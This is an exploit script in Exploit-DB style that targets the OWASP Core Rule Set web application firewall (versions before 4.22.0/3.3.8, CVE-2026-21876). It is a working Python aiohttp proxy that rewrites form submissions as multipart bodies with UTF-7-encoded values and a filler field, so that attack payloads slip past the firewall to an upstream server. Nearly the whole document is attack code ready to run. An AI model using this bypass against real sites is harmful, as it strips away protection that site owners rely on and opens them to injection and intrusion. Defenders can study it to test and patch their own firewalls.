# Exploit Title: coreruleset 4.21.0 - Firewall Bypass # Date:* 04/08/2026* # Exploit Author: Daytrift Newgen # Vendor Homepage: https://github.com/coreruleset # Software Link: https://github.com/coreruleset/coreruleset # Version: < 4.22.0/3.3.8 # Tested on: Fedora, MacOS # CVE : CVE-2026-21876 import base64 import os from cgi import parse_header from urllib.parse import parse_qsl from aiohttp import web, ClientSession, MultipartWriter from yarl import URL # Target UPSTREAM = os.getenv("UPSTREAM", "http://host:8083") HOP_BY_HOP_HEADERS = { "connection", "keep-alive", "proxy-authenticate", "proxy-authorization", "te", "trailer", "transfer-encoding", "upgrade", } def _make_upstream_url(request): base = URL(UPSTREAM) return str( base.with_path(request.rel_url.path).with_query(request.rel_url.query) ) def _copy_headers_for_upstream(request): headers: dict[str, str] = {} for k, v in request.headers.items(): lk = k.lower() if lk in HOP_BY_HOP_HEADERS: continue if lk in {"host", "content-length"}: continue if lk == "content-type": continue headers[k] = v return headers def _utf7_encode(text): result = b"" for char in text: utf16_bytes = char.encode('utf-16-be') b64 = base64.b64encode(utf16_bytes).rstrip(b'=') result += b'+' + b64 + b'-' return result def _form_urlencoded_to_multipart(body, content_type): _, params = parse_header(content_type or "") charset = params.get("charset", "utf-8") text = body.decode(charset, errors="replace") pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors="replace") mp = MultipartWriter("form-data") for key, value in pairs: part = mp.append(_utf7_encode(value)) part.headers["Content-Type"] = "text/plain; charset=utf-7" part.set_content_disposition("form-data", name=key) part2 = mp.append('a'.encode("utf-8")) part2.set_content_disposition("form-data", name="aBdC401") part2.headers["Content-Type"] = "text/plain; charset=utf-8" return mp, mp.content_type async def handle(request): upstream_url = _make_upstream_url(request) headers = _copy_headers_for_upstream(request) content_type = request.headers.get("Content-Type", "") body = await request.read() data = body if content_type.startswith("application/x-www-form-urlencoded"): mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type) data = mp headers["Content-Type"] = mp_content_type async with request.app["session"].request( method=request.method, url=upstream_url, headers=headers, data=data, allow_redirects=False, # proxy="http://127.0.0.1:8080", ) as resp: resp_body = await resp.read() response_headers = { k: v for k, v in resp.headers.items() if k.lower() not in HOP_BY_HOP_HEADERS } return web.Response( status=resp.status, headers=response_headers, body=resp_body, ) async def on_startup(app): app["session"] = ClientSession() async def on_cleanup(app): await app["session"].close() app = web.Application(client_max_size=50 * 1024 * 1024) app.router.add_route("*", "/{tail:.*}", handle) app.on_startup.append(on_startup) app.on_cleanup.append(on_cleanup) if __name__ == "__main__": # Local proxy web.run_app(app, host="0.0.0.0", port=8085)